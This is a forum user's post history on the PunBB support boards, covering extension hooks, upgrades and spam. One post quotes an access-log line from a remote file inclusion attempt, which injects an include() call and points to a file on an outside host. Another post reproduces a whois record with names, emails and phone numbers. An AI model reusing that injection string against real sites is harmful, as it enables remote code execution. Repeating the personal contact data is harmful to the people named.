1

(151 replies, posted in PunBB 1.3 extensions)

I have just started looking at how to make extensions, but to implement some vital bbcode extensions for my site it seems I need hooks in parser.php (yes I know it is being rewritten, but thought you might like to know some suggested locations):

Line 34, After "$smiley_img" lines so more smileys can be added

Line 320 and 329, In do_bbcode(), after $pattern and $replace arrays, so new bbcode tags can be implemented

Line 365, In do_smilies(), after "$text = preg_replace(..." inside loop so more smileys can be implemented

Line 379, In parse_message(), after "$text = censor_words($text);" so I can pre-parse some tags

Line 413, In parse_message(), after "$text = str_replace($pattern, $replace, $text);" so I can parse a tag

Line 425, In parse_message(), after "if (isset($inside[$i])) {" before "$text .= '</p><div class=..." as I need to undo the math tag inside code tags.

Line 429, In parse_message(), before "// Add paragraph tag...", which is the correct place for another tag

And whatever standard place you would include new functions

2

(48 replies, posted in News)

Brilliant, thanks.

3

(48 replies, posted in News)

Is there a beta version more recent than 30 Jan 08?

4

(98 replies, posted in News)

Thanks, Rickard and the Team!

Took me a couple of hours (I have a lot of mods), but it is nice to know I have the most secure site possible.

Keep up the good work.

5

(7 replies, posted in PunBB 1.2 discussion)

Thanks Smartys, found a good topic on it here: http://wordpress.org/support/topic/20758

I resurrected this topic coz it was what I found on a search, and others are likely to find it too.

6

(7 replies, posted in PunBB 1.2 discussion)

I get it too. The word "curl " (needs a space) causes problems. Also "wget ". Any ideas?

It came up on my forum here: http://www.mathsisfun.com/forum/viewtopic.php?id=5346

And a member found a discussion on another forum here: http://forums.asmallorange.com/lofivers … t3631.html

7

(95 replies, posted in News)

Thanks, it is so good to have these updates.

8

(69 replies, posted in News)

Stahn wrote:

Please don't hurry a release of the next version, the most important thing is to make a fully stable release. Keep on the good work, I love PunBB.

Hear! Hear! My sentiments exactly.

Thanks for the update.

And excuse those who want 1.3 in a hurry - they are just excited smile

9

(71 replies, posted in News)

Connorhd wrote:

The language isn't really that important, the chances of 2 users registering with the same IP address within the space of an hour is extremely slim.

I get schools on my website - hundreds of people all with the one IP, and usually a whole class at one time!

But I certainly don't want malicious floods, so this update is much appreciated, thanks Rickard.

10

(19 replies, posted in PunBB 1.2 discussion)

Great for modifying!

I run a math forum, and the members ask for special features - I can usually provide it, because PunBB's code is neatly done.

And the community is great, with lots of "mods" already in existence.

11

(109 replies, posted in General discussion)

Take your time ...

PunBB 1.2.10 is such an excellent, fast, stable and secure product that I am content to wait for 1.3, and even to wait for 1.3.1 smile

12

(16 replies, posted in PunBB 1.2 discussion)

Thanks for the reply, Rickard!

And thanks, Smartys for the mod_security suggestion - I will study up on it.

In the meantime I may end up writing a "kludge" in PunBB to solve it, because it is annoying my members.

13

(16 replies, posted in PunBB 1.2 discussion)

My forum is receiving nearly hourly spam postings for Viagra, Cialis, etc. Probably from a robot.

The domain they point to is usually "sti.ipc.ru", but there have been variations. The IP is always different. And they are posted to the Guestbook (so no registration required). And the topic has so far always been a US State (example "Illinois")

Is there a way to fight back? Some way of not allowing a post that contains a certain keyword?

Anyone else having this problem?

14

(4 replies, posted in PunBB 1.2 modifications, plugins and integrations)

sad "You do not have permission to view this board"

15

(8 replies, posted in PunBB 1.2 discussion)

Yep, the IP seems to be randomly generated.

Same file trying to be inserted: "http://www.yatas.com/phpbb_private.txt" ?

We could possibly get that site shut down ... and try to follow the trail further.

16

(8 replies, posted in PunBB 1.2 discussion)

The file "http://www.yatas.com/phpbb_private.txt" is:

<body bgcolor="black">
<center><img src="http://sinanreklam.net/images/owned.jpg"><br><font color="white" size="3">hehehehe</center>
</body>

And a whois on yatas.com reveals:

Registrant:
     Muammer OZTASKIN ahmetk@artmedya.com +90.2125075142
     Muammer OZTASKIN
     Keresteciler Sitesi Cinar Sokak
     Istanbul,TR,TR 34010


Domain Name:yatas.com
Record last updated at 2005-05-27 10:12:58
Record created on 1997/6/9
Record expired on 2010/6/9


Domain servers in listed order:
     ns.artmedya.com      ns2.artmedya.com

Administrator:
     name:(Ahmet Karamanlargil)
    Email:(ahmetk@artmedya.com) tel-- +90.2125075142
     Artmedya Internet Reklamcilik Ltd Sti
     Keresteciler Sitesi Cinar Sokak

17

(8 replies, posted in PunBB 1.2 discussion)

Ahh ... were they being silly, then?

I think all they managed to do was to use a little bandwidth. Potentially nasty stuff, though ... I imagine PunBB is immune to this kind of attack.

Note: IP was different for each log entry, so they were spoofing that.

Any clues as to tracking these criminals down?

18

(8 replies, posted in PunBB 1.2 discussion)

My bandwidth had a big spike, so I trawled thru logs and found lots of these:

38.112.131.75 - - "GET /forum/viewtopic.php?pid=1197&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 31309 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t f**k Aleks)"

(I edited the swear word there)

What were they intending to do?

19

(121 replies, posted in PunBB 1.2 discussion)

So, you will have LOTS of hooks around the place?

Does that mean that my personal customisations can be gathered together into an extension, and when i need to upgrade I can just take the standard install and apply "my extension", and the upgrade is done?

20

(1 replies, posted in PunBB 1.2 show off)

Looks great - clean, easy-to-use layout.

Makes me want to post a message, but my french is too poor.

21

(5 replies, posted in PunBB 1.2 bug reports)

But then if you get pulled over by the police for speeding, you may also get fined for dangerous driving ...

22

(124 replies, posted in News)

Just sent you $12.00 as a (very) small thank you for your efforts!

(Note: the traffic you would get from milliondollarhomepage would be "untargetted" ... just use up bandwidth.)

23

(67 replies, posted in News)

The email notification worked well, thanks Rickard.

I was wondering - would it be a good idea to make the changelog and/or hdiff files available only to registered members? Because they do seem to "point the way" for hackers. Now, I suppose a dedicated hacker could always do a file comparison themselves, but at least we aren't making it easy for them.

24

(1 replies, posted in PunBB 1.2 troubleshooting)

That's starting from scratch, but I was there once, too!

Apache is the software that serves up web pages.
PHP is a scripting language that can respond to user input and format pages to suit. Basically it creates web pages "on the fly".
MySQL is a database that can store stuff for later use.

PHP works very well with MySQL to create dynamic sites, such as a forum.

For example, when you type something on this site, it is given to a ".php" page which reads what you have written and stores it in a MySQL database. Later on when you (or anyone else) want so see it "PHP" looks up the MYSQL database to retrieve what you wrote, formats it neatly and places it on the page.

Now, most webhosting companies give you the option of having PHP and MySQL available. If you have such a webhosting package, then you can donwload the software that runs this forum, upload it to your website, run the install (follow the instructions) and hopefully you will have a forum running!

But I would advise you to learn PHP, so buy a book on it. Most good PHP books cover a bit about MySQL, too.

While doing the upgrade from 1.2.6 I simply copied some files, while others I used hdiff.

But when I started on the hdiff for include/parser.php, it didn't match with my 1.2.6 or the 1.2.7 that I downloaded !

The first part is similar, but then the hdiff starts into "$pattern =" which is not on either version of parser.php

Am I doing the wrong thing, or to the wrong thing, here?